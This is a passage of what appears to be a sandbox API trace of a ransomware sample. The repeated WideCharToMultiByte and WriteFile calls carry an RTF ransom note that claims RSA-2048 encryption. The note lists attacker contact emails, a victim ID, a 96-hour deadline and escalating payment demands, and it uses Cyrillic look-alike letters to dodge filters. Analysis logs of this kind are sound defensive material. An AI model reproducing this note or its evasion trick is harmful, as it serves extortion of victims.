100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchWideChar=5682, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5682 [0112.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchWideChar=5682, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5682 [0112.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu d", cchWideChar=5682, lpMultiByteStr=0x1230018, cbMultiByte=5682, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset204 Calibri;}{\\f1\\fnil\\fcharset0 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;}\r\n{\\*\\generator Msftedit 5.41.21.2510;}\\viewkind4\\uc1\\pard\\ri-500\\sa200\\sl240\\slmult1\\tx8804\\b\\f0\\fs28\\'c0\\lang1033\\f1 tt\\lang1049\\f0\\'e5\\lang1033\\f1 nti\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0 ! \\'c0\\lang1033\\f1 ll\\lang1049\\f0 \\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur\\lang1049\\f0 \\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 \\lang1033\\f1 w\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 n\\lang1049\\f0\\'f1\\lang1033\\f1 ry\\lang1049\\f0\\'f0\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d with RS\\lang1049\\f0\\'c0-\\lang1033\\f1 2048 \\lang1049\\f0\\'e0\\lang1033\\f1 lg\\lang1049\\f0\\'ee\\lang1033\\f1 rithm\\lang1049\\f0 .\\par\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\lang1033\\b0\\f1\\fs24 With\\lang1049\\f0\\'ee\\lang1033\\f1 ut \\lang1049\\f0\\'f3\\'ee\\lang1033\\f1 ur p\\lang1049\\f0\\'e5\\lang1033\\f1 rs\\lang1049\\f0\\'ee\\lang1033\\f1 n\\lang1049\\f0\\'e0\\lang1033\\f1 l d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 pti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r\\lang1049\\f0\\'f3\\lang1033\\f1 is imp\\lang1049\\f0\\'ee\\lang1033\\f1 ssibl\\lang1049\\f0\\'e5\\lang1033\\f1 !\\par\r\nT\\lang1049\\f0\\'ee \\lang1033\\f1 g\\lang1049\\f0\\'e5\\lang1033\\f1 t y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 k\\lang1049\\f0\\'e5\\lang1033\\f1 y \\lang1049\\f0\\'e0\\lang1033\\f1 nd d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 t th\\lang1049\\f0\\'e5\\lang1033\\f1 fil\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0 , \\lang1033\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\lang1033\\f1 to s\\lang1049\\f0\\'e5\\lang1033\\f1 nd th\\lang1049\\f0\\'e5\\lang1033\\f1 f\\lang1049\\f0\\'ee\\lang1033\\f1 ll\\lang1049\\f0\\'ee\\lang1033\\f1 wing c\\lang1049\\f0\\'ee\\lang1033\\f1 d\\lang1049\\f0\\'e5:\\par\r\n\\pard\\sa200\\sl240\\slmult1\\lang1033\\b\\f1\\fs28 COSLb0cVd9bCx1vp-3188F4D96148D062\\lang1049\\f0\\fs32\\par\r\n\\lang1033\\b0\\f1\\fs24 t\\lang1049\\f0\\'ee\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 ur \\lang1049\\f0\\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\lang1033\\b\\f1\\fs28 bluetablet9643@yahoo.com\\lang1049\\b0\\f0\\fs32\\par\r\n\\lang1033\\f1\\fs24 Th\\lang1049\\f0\\'e5\\lang1033\\f1 n Y\\lang1049\\f0\\'ee\\lang1033\\f1 u will r\\lang1049\\f0\\'e5\\lang1033\\f1 ci\\lang1049\\f0\\'e5\\lang1033\\f1 v\\lang1049\\f0\\'e5 \\'e0\\lang1033\\f1 ll n\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0\\'e0\\lang1033\\f1 ry instru\\lang1049\\f0\\'f1\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 ns\\lang1049\\f0 .\\par\r\n\\cf1\\lang1033\\b\\f1 Y\\lang1049\\f0\\'ee\\lang1033\\f1 u h\\lang1049\\f0\\'e0\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'ee\\lang1033\\f1 nl\\lang1049\\f0\\'f3\\lang1033\\f1 \\lang1049\\f0 96\\lang1033\\f1 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs t\\lang1049\\f0\\'ee\\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 c\\lang1049\\f0\\'ee\\lang1033\\f1 v\\lang1049\\f0\\'e5\\lang1033\\f1 r y\\lang1049\\f0\\'ee\\lang1033\\f1 ur d\\lang1049\\f0\\'e0\\lang1033\\f1 t\\lang1049\\f0\\'e0\\lang1033\\f1 ! \\lang1049\\f0\\'c0\\lang1033\\f1 ft\\lang1049\\f0\\'e5\\lang1033\\f1 r this tim\\lang1049\\f0\\'e5\\lang1033\\f1 y\\lang1049\\f0\\'ee\\lang1033\\f1 ur uniqu\\lang1049\\f0\\'e5 \\lang1033\\f1 d\\lang1049\\f0\\'e5\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'f3\\'f0\\lang1033\\f1 ti\\lang1049\\f0\\'ee\\lang1033\\f1 n k\\lang1049\\f0\\'e5\\lang1033\\f1 y will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 d\\lang1049\\f0\\'e5\\lang1033\\f1 l\\lang1049\\f0\\'e5\\lang1033\\f1 t\\lang1049\\f0\\'e5\\lang1033\\f1 d \\lang1049\\f0\\'e0\\lang1033\\f1 nd fil\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0 d\\'e5\\'f1r\\'f3\\'f0ti\\'een will b\\'e5c\\'eem\\'e5 im\\'f0\\'eessibl\\'e5\\lang1033\\f1 !\\par\r\nHurr\\lang1049\\f0\\'f3\\lang1033\\f1 u\\lang1049\\f0\\'f0\\lang1033\\f1 ! \\lang1049\\f0\\'c5\\'e0\\'f1\\lang1033\\f1 h 12 h\\lang1049\\f0\\'ee\\lang1033\\f1 urs\\lang1049\\f0 \\lang1033\\f1 th\\lang1049\\f0\\'e5\\lang1033\\f1 p\\lang1049\\f0\\'e0\\'f3\\lang1033\\f1 m\\lang1049\\f0\\'e5\\lang1033\\f1 nt siz\\lang1049\\f0\\'e5\\lang1033\\f1 will b\\lang1049\\f0\\'e5\\lang1033\\f1 \\lang1049\\f0\\'e0\\lang1033\\f1 ut\\lang1049\\f0\\'ee\\lang1033\\f1 m\\lang1049\\f0\\'e0\\lang1033\\f1 tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il f\\'eer m\\'eer\\'e5 th\\lang1033\\f1 e\\lang1049\\f0 n \\lang1033\\f1 24\\lang1049\\f0 h\\lang1033\\f1 o\\lang1049\\f0 urs (\\'e0nd \\'eenly in this c\\'e0s\\'e5!), us\\'e5 th\\'e5 \\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 rv\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\par\r\n\\lang1033\\b\\f1\\fs28 decodedecode@yandex.ru\\lang1049\\f0\\fs32\\par\r\n\\par\r\n}\r\n \r\n", lpUsedDefaultChar=0x0) returned 5682 [0112.816] WriteFile (in: hFile=0xf4, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x1632, 